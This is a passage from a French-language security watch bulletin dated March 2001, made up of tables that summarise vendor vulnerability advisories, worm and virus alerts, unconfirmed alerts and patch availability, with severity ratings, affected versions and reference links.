http://www.finjan.com/attack_release_detail.cfm?attack_release_id=48
Finjan
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NAKEDWIFE
Trend Micro
http://vil.nai.com/vil/virusSummary.asp?virus_k=99035
NAI / McAfee
http://www.data-fellows.com/v-descs/nakedwif.shtml
F-Secure
http://www.sophos.com/virusinfo/analyses/w32naked.html
Sophos
http://ca.com/press/2001/03/nakedwife_trojan_virus.htm
CA
CISCO
Vulnérabilité dans 'Cisco IOS'
Un défaut dans 'Cisco IOS' permet de voir ou de modifier sans autorisation un nombre limité d'objets 'SNMP' à
l'aide d'un nom de communauté 'ILMI' (Interim Local Management Interface) non documenté.
Forte
27/02 Cisco IOS Software versions 11.x et 12.0
Utilisation d'un nom de communauté 'ILMI' non documenté
Correctif existant Requête 'SNMP'
http://www.cisco.com/warp/public/707/ios-snmp-ilmi-vuln-pub.shtml
CSCdp11863
Vulnérabilités dans 'Cisco IOS' et 'Cisco CatOS'
Plusieurs vulnérabilités présentes dans 'Cisco IOS' et 'Cisco CatOS' peuvent compromettre la configuration des
interfaces.
Forte
28/02 Cisco IOS Software versions 11.x, 12.0 - Cisco CatOS Software 5.4, 5.5 et 6.1
Accès aux variables contenues dans la 'MIB'
Correctif existant Protocole 'SNMP'
http://www.cisco.com/warp/public/707/ios-snmp-community-vulns-pub.shtml
Multiples
Accès aux 'Cisco Aironet 340' via l'interface web
Il est possible de visualiser et de modifier la configuration des ponts 'Cisco Aironet 340' via l'interface web.
Forte
07/03 Aironet AP4500, AP4800, BR100, BR500 - Aironet AIR-BR340 en V7.x, 8.07 ou 8.24
Accès non restreint
Correctif existant Interface WEB
http://www.cisco.com/warp/public/707/Aironet340-pub.shtml
CSCdt52783
Prédiction des numéros de séquence TCP sur 'Cisco IOS'
La prédiction des numéros de séquence TCP sur 'Cisco IOS' peut mettre en défaut le contenu des paquets d'une
connexion TCP.
Moyenne 28/02 Tous les produits utilisant 'Cisco IOS'
Numéro de séquence prédictible
Correctif existant Pile TCP/IP
http://www.cisco.com/warp/public/707/ios-tcp-isn-random-pub.shtml
CSCds04747
COMPAQ
Trafic non sécurisé dans 'Compaq Management Agents'
Les ports utilisés par les agents 'web-enabled' utilisés par 'Compaq Management Agents' peuvent être accédés à
distance sans contrôle.
Critique 21/03 Windows 9x, NT, 2000 - NetWare
Correctif existant
SSRT0715
SCO Open Server 5, UnixWare 7 - RedHat 6.2 et 7.0
Tru64 UNIX V4.0f, 4.0g, 5.0, 5.0a, 5.1 , OpenVMS et Produits de stockage Compaq
Agents 'web-enabled'
Trafic via les ports TCP 2301 et 280
http://www.compaq.com/products/servers/management/mgtsw-advisory.html
Page 28/51
Mars 2001
Déni de service dans 'inetd'
Une vulnérabilité affecte le service 'inetd'.
Moyenne 23/02 Compaq's Tru64 UNIX version 5.1 (tous niveaux de patch)
Non disponible
Correctif existant Démon 'inetd'
http://ftp.support.compaq.com/patches/public/Readmes/unix/ssrt0708u.html
SSRT0708U
FreeBSD
Déni de service dans 'timed'
Le démon 'timed' est sensible à une vulnérabilité de type déni de service exploitable à distance.
Moyenne 12/03 FreeBSD 3.x, 4.x
Mauvais traitement des paquets malformés
Correctif existant 'timed'
FreeBSD-SA01:28 http://www.freebsd.org/security/security.html#adv
Déni de service dans 'rwhod'
Le démon 'rwhod' est sensible à une vulnérabilité de type déni de service exploitable à distance.
Moyenne 12/03 FreeBSD 3.x, 4.x
Mauvais traitement des paquets malformés
Correctif existant 'rwhod'
Vulnérabilité dans le module 'ufs/ext2fs'
Une vulnérabilité dans le module 'ufs/ext2fs' permet d'accéder en lecture aux fichiers effacés.
Moyenne 22/03 FreeBSD versions 3.x, 4.x
Non positionnement à zéro des fichiers effacés
Correctif existant 'ufs/ext2fs'
Existence d'une ancienne vulnérabilité dans 'sunrpc'
Une vulnérabilité, découverte en 1998, semble encore être d'actualité. Elle affecte 'sunrpc' de FreeBSD.
Moyenne 28/02 Testé sur FreeBSD 4.2
Débordement de buffer
Correctif existant Code sunrpc de FreeBSD 'libc'
http://www.linuxsecurity.com/advisories/freebsd_advisory-1178.html
Linux Security
HP
Correctifs contre les vulnérabilités affectant 'BIND'
Plusieurs vulnérabilités exploitables à distance affectent 'BIND'.
Critique 01/03 HP-UX versions 11.11, 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01 sur HP9000 server et workstation.
Correctif existant 'BIND'
HPSBUX0102-144 http://europe-support.external.hp.com/
Débordement de buffer dans 'crontab'
Il existe un débordement de buffer exploitable localement dans 'crontab'.
Forte
18/03 HP-UX versions 11.00, 11.04, 10.20, 10.24, 10.10 et 10.01 sous HP9000 séries 700 et 800
Correctif existant 'crontab'
Vulnérabilité dans MPE/iX 'AIF'
Il existe une faille de sécurité dans 'AIF'
Forte
12/03 MPE/iX versions 5.5 et supérieures sur HP3000
Non disponible
Correctif existant Architected Interface Facility
HPSBMP0103-011 http://europe-support2.external.hp.com/
Vulnérabilité dans 'HP OpenView OmniBack'
Une vulnérabilité dans 'HP OpenView OmniBack' permet d'obtenir un interpréteur de commandes 'administrateur' à
distance.
Forte
28/02 Windows NT 4.0, 2000 et systèmes HP-UX utilisant OmniBack versions 3.00 ou supérieures
Non disponible
Correctif existant HP OpenView OmniBack
Vulnérabilité dans 'SD-UX'
Une faille de sécurité affecte localement HP Software Distributor 'SD-UX'.
Forte
28/02 HP-UX releases 10.01, 10.10, 10.20 et 11.00 sur HP9000 séries 700/800.
Non disponible
Correctif existant Software Distributor 'SD-UX'
Déni de service dans 'asecure'
Il existe une vulnérabilité de type déni de service dans 'asecure'.
Moyenne 07/03 HP-UX versions 10.01, 10.10, 10.20 et 11.00 sur HP9000 séries 700/800
Mauvaises permissions de fichiers
Correctif existant 'asecure'
HPSBUX0103-145 http://europe-support2.external.hp.com/
Page 29/51
Mars 2001
IBM
Mots de passe de 'NetCommerce' déchiffrés
Un outil de déchiffrement permet de révéler les mots de passe 'NetCommerce'.
NetCommerce Hosting Server V 3.1.1, 3.1.2 et 3.2
Critique 07/03 NetCommerce V 3.1, 3.1.1, 3.1.2 et 3.2
Aucun correctif
IBM WCS 2001-1
IBM WCS 2001-2
WebSphere Commerce Suite V 4.1 et 4.1.1
WebSphere Commerce Suite (Service Provider Edition) V3.2
Websphere Commerce Suite (Market Place Edition) V 4.1
Outil 'SUQ.DIQ version 1.00'
Déchiffrement de mot de passe
http://www-4.ibm.com/software/webservers/commerce/servers/2001-1.htm
http://www-4.ibm.com/software/webservers/commerce/servers/2001-2.htm
IMAPD
Débordement de buffer dans 'imapd'
Il est possible de provoquer à distance un débordement de buffer dans le démon 'imapd'.
Forte
21/02 IMAP4rev1 v12.261, v12.264 et 2000.284. D'autres versions non testées sont probablement affectées.
Correctif existant
Les distributions suivantes ont un démon vulnérable: Slackware 7.0, 7.1 - RedHat 6.2 - Zoot - Conectiva 6.0
Commande 'lsub'
bufferoverflow.org
http://www.bufferoverflow.org/noticias.php?id=35
ISS
Déni de service dans 'RealSecure Network Sensor'
Il est possible de provoquer à distance un déni de service dans 'RealSecure Network Sensor'.
Critique 12/03 ISS RealSecure Network Sensor (versions inférieures à la 5.0 MicroUpdate 1.2)
'Network Sensor'
Flood d'attaques (attaques en masse)
Aucun correctif
http://www.checkpoint.com/techsupport/alerts/rsdos.html
Checkpoint
LINUX
Débordement de buffer dans 'ePerl'
Plusieurs débordement de buffer exploitables localement et à distance existent dans 'eperl'.
Forte
08/03 Linux Debian 2.2 - Linux Mandrake 7.1, 7.2 et Corporate Server 1.0.1
Correctif existant 'eperl'
http://lists.debian.org/debian-security-announce-01/msg00031.html
DSA-034-1
MDKSA-2001:027 http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-027.php3
Vulnérabilité dans le paquetage 'mutt'
Un bug de formatage de chaînes de caractères, exploitable localement, est présent dans 'mutt'.
Moyenne 15/03 Immunix OS 6.2, 7.0-beta, 7.0 - Red Hat 5.2, 6.2 et 7.0 - Mandrake 6.x, 7.x
Formatage de chaînes de caractères
Correctif existant 'mutt'
http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-006-01
2001-70-006-01
http://www.redhat.com/support/errata/RHSA-2001-029.html
RHSA-2001:029
Vulnérabilité de type symlink dans 'joe'
Une vulnérabilité de type symlink dans 'joe' peut localement amener un utilisateur à usurper l'identité d'un tiers.
Moyenne 03/03 Red Hat Linux 5.2, 6.2 et 7.0 - Debian 2.2 - Mandrake 6.x, 7.x
Chargement non sécurisé du fichier de configuration
Correctif existant 'joe'
DSA-034-1
http://www.linuxsecurity.com/advisories/redhat_advisory-1182.html
RHSA-2001:024
Vulnérabilité dans le paquetage 'sgml-tools'
Une vulnérabilité de type lien symbolique est exploitable localement dans 'sgml-tools'.
Moyenne 08/03 Red Hat Linux 5.2, 6.2 et 7.0 - Debian 2.2 - Mandrake 6.x, 7.x
Suivi de lien symbolique dans '/tmp'
Correctif existant 'sgml-tools'
DSA-038-1
RHSA-2001:027
Vulnérabilités dans le paquetage 'licq'
Le paquetage 'licq' contient deux vulnérabilités exploitables à distance.
Moyenne 21/03 Linux Red Hat 7.0 - Mandrake
Débordement de buffer et Appel système non sécurisé
Correctif existant 'licq'
http://ciac.llnl.gov/ciac/bulletins/l-063.shtml
CIAC [L-063]
RHSA-2001:022
Page 30/51
Mars 2001
LINUX CALDERA
Débordement de buffer dans 'imap', 'ipop2d' et 'ipop3d'
Plusieurs débordement de buffer dans les paquetages 'imap' peuvent être exploités pour obtenir accès distant non
privilégié.
Forte
12/03 OpenLinux 2.3, 2.3.1 et eBuilder: versions antérieures à imap-4.6.BETA-2
Correctif existant
CSSA-2001-011.0
CLA-2001:388
Linux Security
OpenLinux eDesktop 2.4: versions antérieures à imap-4.7-2
Conectiva
'imap', 'ipop2d' et 'ipop3d'
Débordement de buffer et Défaut de configuration
http://www.caldera.com/support/security/advisories/CSSA-2001-011.0.txt
http://www.linuxsecurity.com/advisories/other_advisory-1228.html
http://www.linuxsecurity.com/advisories/caldera_advisory-1206.html
Débordement de buffer dans '/bin/mail'
Il existe un débordement de buffer exploitable localement dans '/bin/mail'.
Forte
03/03 OpenLinux 2.3, 2.3.1 et eBuilder: versions antérieures à mailx-8.1.1-12OL
Correctif existant
CSSA-2001-010.0
Linux Security
OpenLinux eDesktop 2.4: versions antérieures à mailx-8.1.1-12
'/bin/mail' (paquetage mailx)
http://www.calderasystems.com/support/security/advisories/CSSA-2001-010.0.txt
http://www.linuxsecurity.com/advisories/caldera_advisory-1181.html
LINUX DEBIAN
Vulnérabilités dans 'proftpd'
Deux vulnérabilités existent dans 'proftpd'.
Forte
07/03 Linux Debian 2.2 (potato)
Erreur de configuration / Lien symbolique
Correctif existant 'proftpd'
DSA-032-1
Déni de service dans 'man2html'
Un utilisateur peut provoquer à distance un déni de service sur 'man2html'.
Forte
07/03 Linux Debian 2.2 (toutes architectures)
Consommation des ressources mémoire
Correctif existant 'man2html'
DSA-035-1
Usurpation d'identité dans 'mc' (Midnight Commander)
Il est possible d'exécuter localement un programme via le gestionnaire de fichiers 'mc' sous l'identité d'un tiers.
Moyenne 07/03 Linux Debian 2.2
Exécution non sécurisée de programmes
Correctif existant 'mc' (Midnight Commander)
DSA-036-1
LINUX REDHAT
Débordement de buffer dans 'Secure Web Server'
Il existe un débordement de buffer dans Red Hat 'Secure Web Server'.
Forte
23/02 Red Hat Secure Web Server 2.0 (i386)
Correctif existant Commande 'ALIAS'
RHSA2001:017
LINUX SuSE
Vulnérabilités dans 'cups'
Plusieurs vulnérabilités sont exploitables à distance dans 'cups'.
Forte
06/03 Linux SuSE 7.1 (cups versions inférieures à 1.1.6)
Correctif existant 'cups'
SUSE SA:2001:05 http://www.linuxsecurity.com/advisories/suse_advisory-1183.html
MICROSOFT
Noms de fichiers 'cachés' révélés dans 'IE'
Il est possible, sous certaines conditions, de connaître le nom donné aléatoirement à un fichier stocké dans le
cache, à distance, au travers d'une page web ou d'un e-mail.
Critique 06/03 Microsoft Internet Explorer 5.01 et 5.5
Divulgation des nom de fichiers 'cachés'
Correctif existant 'Internet Explorer'
http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
MS01-015
Déni de service sur 'IIS 5.0' et 'Exchange 2000'
Il est possible de provoquer à distance un déni de service sur 'IIS 5.0' et 'Exchange 2000'.
Critique 16/03 Microsoft IIS 5.0M et Exchange 2000 Server utilisant les extension 'OWA'
Débordement de buffer dans les requêtes PROPFIND et SEARCH
Correctif existant WEBDAV
MS01-016
Guninski #38-s39 http://www.guninski.com/
Page 31/51
Mars 2001
Emission par 'VeriSign' de faux certificats 'Microsoft'
VeriSign a émit deux certificats à une personne se faisant passer pour un employé de Microsoft, les 29 et 30 janvier
2001.
Forte
22/03 Microsoft Windows 95, 98, Me, NT 4.0 et 2000
Certificats 'VeriSign'
Usurpation de l'identité du détenteur des certificats
Aucun correctif
http://www.microsoft.com/technet/support/kb.asp?ID=293816
Microsoft KB
MS01-017
Débordement de buffer dans la visionneuse d'évènements
Il est possible de provoquer à distance un débordement de buffer lors de la visualisation d'événements dont la
journalisation a été spécialement formatée.
Forte
26/02 Windows 2000 toutes éditions
Correctif existant Event Viewer
MS01-013
Déni de service sur 'IIS 5.0' et 'Exchange 2000'
Il est possible de provoquer à distance un déni de service sur 'IIS 5.0' et 'Exchange 2000'
Forte
01/03 Microsoft IIS 5.0 et 2000
Correctif existant Analyseur syntaxique des URLs Mauvais traitement de certaines URLs
MS01-014
MICROSOFT / NIPC
Alerte aux vulnérabilités liées à l'e-commerce
Le NIPC (National Infrastructure Protection Center) publie un avis rappelant les vulnérabilités utilisées dans les
récentes attaques de site d'e-commerce et d'e-banking.
2 - Microsoft SQL Server 7.0
Critique
08/03 1 - Microsoft IIS 3.0 et 4.0, MDAC version 1.5
Correctif existant
NIPC [01-003]
Microsoft
3 - Microsoft Windows NT 4.0
4 - Microsoft IIS 5.0
1 - Méthodes d'accès non sécurisées
1 - Objet RDS MDAC
2 - Mauvaise vérification des paramètres
2 - SQL Server MSDE
3 - Permissions laxistes
3 - Base de registre
4 - Acceptation d'URL impropres
4 - Traitement des URL
http://www.nipc.gov/warnings/advisories/2001/01-003.htm
http://www.microsoft.com/technet/security/nipc.asp
MIT/KERBEROS
Vulnérabilité dans 'Kerberos 4' et versions dérivées
Une vulnérabilité de type lien symbolique exploitable localement existe dans les implémentations de 'Kerberos 4' du
MIT et ses dérivées.
Critique 07/03 MIT Kerberos 5 : versions antérieures à krb5-1.2.2-beta1
Correctif existant
MIT
MIT Kerberos 4 :
patch 10 et versions antérieures
Cygnus Kerberos: Kerbnet et Cygnus Network Security
et certaines versions de kth-krb
Bibliothèque 'krb4'
Suivi de lien symbolique dans '/tmp'
http://web.mit.edu/kerberos/www/advisories/krb4tkt.txt
NETSCAPE
Débordement de buffer dans 'Netscape Directory Server'
Un utilisateur distant peut provoquer un débordement de buffer dans 'Netscape Directory Server'.
Critique 07/03 Netscape Directory Server 4.1 et Netscape Messaging Server Netscape Directory Server 4.12
Débordement de buffer dans 'escape_string_with_punctuation()'
Correctif existant NDS
http://www.atstake.com/research/advisories/2001/index.html#030701-1
@stake
NORTEL
Chiffrement '3DES'
Nortel Networks 'CES' (Contivity Extranet Switch) utilise un simple DES lors de l'initialisation IPSEC
Moyen
28/02 Extranet Access Client versions 2.5x et 2.6x. (la version 2.62 est immune, ainsi que CES 3.50)
Correctif existant Processus de chiffrement '3DES' Politique de gestion du premier échange
Bugtraq
NORTEL
OpenBSD
Débordement de buffer dans le traitement des options 'IPSEC'
Un débordement de buffer dans le traitement des options 'IPSEC' peut provoquer à distance un déni de service.
Forte
02/03 OpenBSD 2.8 (toutes architectures)
Correctif existant Code source
http://www.openbsd.org/errata.html#ipsec_ah
OpenBSD
Page 32/51
Mars 2001
Vulnérabilité dans la création d'historiques
Une vulnérabilité dans la création de fichiers rend accessibles ces derniers en lecture et en écriture.
Moyenne 18/03 OpenBSD 2.8 (toutes architectures)
Mauvais positionnement des permissions ('umask')
Correctif existant Librarie 'readline' (history.c)
http://www.openbsd.org/errata.html#readline
OpenBSD [024]
Palm OS
Porte dérobée sur les organiseurs utilisant 'Palm OS'
Il existe un mode 'debug' pouvant servir de porte dérobée sur les organiseurs utilisant Palm OS.
Forte
01/03 Palm OS versions 3.5.2 et inférieures
Palm OS
Activation non sécurisée du mode 'debug'
Aucun correctif
Http://www.atstake.com/research/advisories/2001/index.html#030101-1
@Stake
SSH
Déni de service dans 'sshd'
Il existe une vulnérabilité exploitable à distance dans 'SSH' 2.4 pour Windows pouvant mener un utilisateur à
provoquer un déni de service.
Forte
16/03 SSH Secure Shell versions 2.4 pour Windows Server
Code source 'ssheloop.c'
Limitation à 64 connexions simultanées
Aucun correctif
[USSR-2001001] http://www.ussrback.com/USSR-2001001.html
VIRUS / VERS
Forte activité du ver 'lion' actuellement constatée
Le SANS Institute émet une alerte concernant la forte activité du ver 'lion', un dérivé du ver 'ramen'.
Critique 23/03 Plate-forme Linux utilisant une version BIND 8.2,8.2-P1, 8.2.1, 8.2.2-Px et toutes les version 8.2.3 beta.
Exploitation de la vulnérabilité bind 'TSIG'
Correctif existant Ver 'lion'
http://www.sans.org/y2k/lion.htm
SANS GIAC
Diffusion du virus 'W32/Magistr'
Le virus W32/Magistr apparu ces derniers jours fait l'objet de l'alerte AusCERT AL-2001.03.
Forte
15/03 Toute plate-forme Microsoft Windows
Exécution du virus
Correctif existant Virus
http://www.symantec.com/avcenter/venc/data/[email protected]
Symantec
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=PE_MAGISTR.A
Trend Micro
http://www.europe.f-secure.com/v-descs/magistr.shtml
F-Secure
http://www.sophos.com/virusinfo/analyses/w32mag.html
Sophos
http://ca.com/virusinfo/encyclopedia/descriptions/magistr24876.htm
CA
ftp://ftp.auscert.org.au/pub/auscert/advisory/AL-2001.03
AL-2001.03
ZOPE
Disponibilité des nouveaux paquetages 'zope'
De nouveaux paquetages 'zope' sont disponibles. Ils corrigent plusieurs failles de sécurité.
Forte
27/02 Zope version 2.3.1 b1 et inférieures
Mauvaise assignation de classes
Correctif existant 'Zope'
http://www.zope.org/Products/Zope/Hotfix_2001-02-23/security_alert
Zope
ALERTES NON CONFIRMEES
Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes
d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces
alertes nécessitent la mise en place d’un processus de suivi et d’observation.
CGI/PERL
Vulnérabilité dans le script 'FormMail.pl'
Le script CGI 'FormMail.pl' peut être utilisé à des fins illicites.
Moyenne 12/03 FormMail.pl
Script 'FormMail.pl'
Non vérification des données passées en paramètre
Aucun correctif
Bugtraq
DGUX
Débordement de buffer dans 'lpsched'
Un débordement de buffer, exploitable localement, est présent dans 'lpsched'.
Forte
22/03 DGUX versions R4.20MU06 et MU02 (architecture 32 bits)
'lpsched'
Aucun correctif
http://www.securiteam.com/unixfocus/DGUX_lpsched_Buffer_Overflow.html
Securiteam
Page 33/51
Mars 2001
FTP
Déni de service sur plusieurs serveurs 'ftp'
En soumettant une commande spéciale, il est possible de provoquer à distance un déni de service sur une majorité
des serveurs ftp.
Forte
16/03 Proftpd, NetBSD FTP, Microsoft FTP Service (Version 5.0)
Commande 'ls'
Mauvais traitement des paramètres
Aucun correctif
Bugtraq
MICROSOFT
Vulnérabilité dans 'Personal Web Server' (PWS)
Une vulnérabilité exploitant le bug unicode sur Microsoft 'Personal Web Server' permet l'exécution de code à
distance sur la machine cible.
Forte
18/03 Microsoft Personal Web Server
Bug 'unicode'
Mauvais traitement des URLs
Aucun correctif
Bugtraq
NETSCAPE
Déni de service sur 'Netscape Collabra'
Il est possible de provoquer un déni de service, à distance, sur les serveurs 'Netscape Collabra'.
Moyenne 27/02 Netscape Collabra Server version 3.54 pour Windows NT
Port TCP 5238
Mauvais traitement des données
Aucun correctif
Bugtraq
MYSQL
Vulnérabilité dans le démon 'mysqld'
Une vulnérabilité existe dans le démon 'mysqld' et peut être exploitée localement.
Forte
18/03 Tests effectuées sur mysql-3.20.32a (d'autres versions sont probablement vulnérables)
'mysql'
Ouverture non sécurisée de certains fichiers
Aucun correctif
Bugtraq
NOVELL
Vulnérabilité dans 'Novell Netware'
Une vulnérabilité exploitable à distance dans 'Novell Netware' permet de se connecter sans mot de passe.
Forte
09/03 Novell Netware 3.1-5.1
Serveur d'impression Novell
Absence de mot de passe
Aucun correctif
http://www.securityfocus.com/bid/2446
Bugtraq
QUALCOMM
Vulnérabilité dans 'Eudora' 5.02 Sponsored Mode
Il est possible de provoquer l'installation d'un exécutable sous 'Eudora' version 5.2 par un simple envoi de courrier
électronique.
Critique
18/03 Eudora 5.02 Sponsored Mode
Options spécifiques
Enregistrement automatique des attachements via 'use Microsoft viewer' et
Aucun correctif
Bugtraq
'allow executables in HTML content'
SUN
Débordement de buffer dans 'snmpXdmid'
Il est possible de provoquer à distance un débordement de buffer dans le démon 'snmpXdmid' chargé de combiner
'SNMP' et 'DMI'.
Critique 15/03 Sun Solaris 8 sun4uLe démon est livré avec Sun Solaris versions 2.6, 7 et 8
Démon 'snmpXdmid'
Aucun correctif
Bugtraq
Débordement de buffer dans 'snmpd'
La commande '/opt/SUNWssp/snmpd' est vulnérable à un débordement de buffer exploitable localement.
Forte
13/03 Sun SunOS 5.8
Service '/opt/SUNWssp/snmpd'
Aucun correctif
http://www.securiteam.com/unixfocus/Solaris_5_8_snmpd_Vulnerability.html
Securiteam
Page 34/51
Mars 2001
AUTRES INFORMATIONS
REPRISES D'AVIS
ET
CORRECTIFS
Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont
données lieu à la fourniture d'un correctif:
CIAC
Reprise de l'avis Red Hat RHSA-2001:029-02
Le CIAC a repris, sous la référence L-060, l'avis Red Hat RHSA-2001:029-02 concernant la vulnérabilité dans le
paquetage 'mutt'.
Reprise de l'avis Microsoft MS01-015
Le CIAC a repris, sous la référence L-061, l'avis Microsoft MS01-015 concernant le manque de sécurité d'Internet
Explorer.
Le CIAC a repris, sous la référence L-062, le bulletin Microsoft MS01-017 concernant l'émission par 'VeriSign' de
faux certificats 'Microsoft'.
Le CIAC a repris, sous la référence L-050, l'avis Microsoft MS01-012 concernant une vulnérabilité affectant Outlook
et Outlook Express.
Le CIAC a repris, sous la référence L-051, l'avis Microsoft MS01-013 concernant une vulnérabilité affectant 'Event
Viewer' sous Windows 2000.
Reprise de l'avis CISCO 'ios-snmp-ilmi-vuln-pub'
Le CIAC a repris, sous la référence L-052, l'avis CISCO 'ios-snmp-ilmi-vuln-pub' concernant une vulnérabilité sur
'Cisco IOS' permettant de modifier certains objets 'SNMP' via un nom de communauté 'ILMI' non documenté.
Reprise de l'avis Cisco 'ios-tcp-isn-random-pub'
Le CIAC a repris, sous la référence L-053, l'avis Cisco 'ios-tcp-isn-random-pub' concernant la prédiction des
numéros de séquence TCP sur 'Cisco IOS'.
Le CIAC a repris, sous la référence L-054, l'avis Microsoft MS01-014 concernant une vulnérabilité dans 'IIS 5.0' et
'Exchange 2000'
Reprise de l'avis Symantec 'pcAnywhere' 9.x et 10.x
Le CIAC a repris, sous la référence L-055, l'avis Symantec concernant un débordement de buffer dans 'pcAnywhere'
9.x et 10.x.
Le CIAC a repris, sous la référence L-049, l'avis Microsoft MS01-011 concernant une vulnérabilité sur les
contrôleurs de domaines Windows 2000 Server.
Reprise de l'avis MIT Kerberos 'krb4tkt'
Le CIAC a repris, sous la référence L-057, l'avis MIT concernant une vulnérabilité dans 'Kerberos 4' et versions
dérivées.
Reprise de l'avis Hewlett-Packard HPSBUX0103-145
Le CIAC a repris, sous la référence L-058, l'avis Hewlett-Packard HPSBUX0103-145 concernant une vulnérabilité
dans 'asecure'.
Le CIAC a repris, sous la référence L-059, l'avis Microsoft MS01-016 concernant une vulnérabilité sur 'IIS 5.0'
Page 35/51
Mars 2001
COMPAQ
Disponibilité des correctifs pour 'named'
Compaq publie plusieurs correctifs contre la vulnérabilité affectant 'named' (bind) ayant fait l'objet du bulletin CERT
(CA-2001-02). Les correctifs sont à destination des plate-formes suivantes : Tru64 UNIX Version 4.0D, 4.0F, 4.0G,
5.0, 5.0A et 5.1.
http://ftp.support.compaq.com/patches/.new/security.shtml
FREEBSD
Disponibilité de plusieurs correctifs
FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
icecast
FreeBSD-SA-01:23
interbase
FreeBSD-SA-01:26
cfengine
FreeBSD-SA-01:27
timed
FreeBSD-SA-01:28
rwhod
FreeBSD-SA-01:29
http://www.linuxsecurity.com/advisories/
HP
Révision de l'avis HPSBUX0012-135 au sujet de 'kermit'
HP apporte une révision au bulletin HPSBUX0012-135. De nouveaux correctifs sont proposés contre le déni de
service affectant le logiciel de communication 'kermit' sur HP-UX.
Version 11.00 : PHCO_22665
10.20 : PHCO_23319
10.10 : PHCO_23320
10.01 : PHCO_23321.
http://europe-support.external.hp.com
LOTUS/IBM
Note d'information sur la vulnérabilité 'Lotus Notes'
Lotus publie une 'FAQ' au sujet de la vulnérabilité affectant les formulaires 'Lotus Notes'. Cette note permet de
contourner le problème sans pour autant éliminer la vulnérabilité.
http://support.lotus.com/sims2.nsf/eb5fbc0ab175cf0885256560005206cf/89e023ae7ee59e5d852569f90059fd5e?OpenDocument
LINUX DEBIAN
Disponibilité de nombreux correctifs
Debian annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
mgetty
DSA-011-2
proftpd
DSA-029-2
sudo
DSA-031-3
proftpd
DSA-032-2
analog
DSA-033-1
ePerl
DSA-034-1
man2html
DSA-035-1
mc
DSA-036-1
athena
DSA-037-1
sgml-tools
DSA-038-1
glibc
DSA-039-1
slrn
DSA-040-1
joe
DSA-041-1
gnuserv,xemacs DSA-042-1
zope
DSA-043-1
mailx
DSA-044-1
http://lists.debian.org/debian-security-announce-01
LINUX MANDRAKE
Mandrake annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
sudo
MDKSA-2001:024-1
7.1 / 7.2 / CS1.0.1
zope
MDKSA-2001:025
7.1 / 7.2 / CS1.0.1
joe
MDKSA-2001:026
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
ePerl
MDKSA-2001:027
7.1 / 7.2 / CS1.0.1
slrn
MDKSA-2001:028
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
mesa
MDKSA-2001:029
7.2
sgml-tools
MDKSA-2001:030-1
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
mutt
MDKSA-2001:031
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
licq
MDKSA-2001:032
7.1 / 7.2 / CS1.0.1
openssh
MDKSA-2001:033
7.1 / 7.2 / CS1.0.1
timed
MDKSA-2001:034
6.0 / 6.1 / 7.1 / 7.2 / CS1.0.1
http://www.linux-mandrake.com/en/security/2001
Page 36/51
Mars 2001
LINUX REDHAT
RedHat annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:
analog
RHSA-2001:017-03
WS2.0
zope
RHSA-2001:021-06
6.2 / 7.0
licq
RHSA-2001:022-01
6.2 / 7.0
joe
RHSA-2001:024-03
5.2 / 6.2 / 7.0
sgml-tools
RHSA-2001:027-02
5.2 / 6.2 / 7.0
slrn
RHSA-2001:028-02
6.2 / 7.0
mutt
RHSA-2001:029-02
5.2 / 6.2 / 7.0
http://www.linuxsecurity.com/advisories/
Disponibilité de nouveaux paquetages 'rpm'
De nouveaux paquetages 'rpm' sont disponibles pour les distributions Linux Red Hat 5.2, 6.2 et 7.0 (architectures
alpha, i386 et sparc). Il existe en effet des problèmes de compatibilité entre les bases de données au format 'db1'
et 'db3' ainsi qu'au niveau du compilateur. Cependant il est possible de rencontrer des problèmes lors de
l'installation de nouveaux paquetages 'rpm' si aucune mise à jour n'est effectuée. Cela équivaudrait à laisser le
système dans une configuration non sécurisée. (voir aussi 'http://www.redhat.com/support/errata/RHEA-2001015.html')
LINUX SuSE
Disponibilité des correctifs pour 'imap'
SuSE [SuSE-SA:2001:06] annonce la disponibilité des correctifs pour 'imap'. En effet, les distributions Linux
comportant un démon 'imapd' vulnérable pouvaient mener un utilisateur distant à obtenir un interpréteur de
commandes sous leur propre identité. Un tel accès n'est pas toujours autorisé. Par exemple, dans le cas de
fournisseurs d'accès Internet proposant un service de messagerie, cette vulnérabilité peut se révéler critique.
http://lists.suse.com/archives/suse-security-announce/2001-Mar/0003.html
Disponibilité des correctifs pour 'in.ftp' et 'timed'
SuSE [SuSE-SA:2001:07] annonce la disponibilité des correctif pour 'in.ftp'
et 'timed' (bulletin 431 du
13/03/2001). Ils corrigents deux vulnérabilités qui permettait l'exécution de code à distance et de provoquer un
déni de service.
http://lists.suse.com/archives/suse-security-announce/2001-Mar/0004.html
Arrêt du support des versions SuSE 6.0, 6.1 et 6.2
SuSE annonce l'arrêt du support des distributions SuSE-Linux versions 6.0, 6.1 et 6.2. Cet arrêt, effectif depuis le
19 mars 2001, intervient cinq semaines après la distribution de la version 7.1. Les versions supportées sont donc
les suivantes : 6.3, 6.4, 7.0 et 7.1.
http://lists.suse.com/archives/suse-security-announce/2001-Feb/0002.html
NetBSD
NetBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:.
USER-LDT
NetBSD-SA2001-001
i386
ftp://ftp.netbsd.org/pub/NetBSD/misc/security/advisories/
PGPi
Disponibilité de la version PGP 2.6.3(i)
La version PGP2.6.3(i) vient d'être rendue disponible. Elle intègre notamment un correctif contre l'attaque
développée par les chercheurs de la société tchèque ICZ. Cette mise à jour confirme la réalité de l'attaque décrite
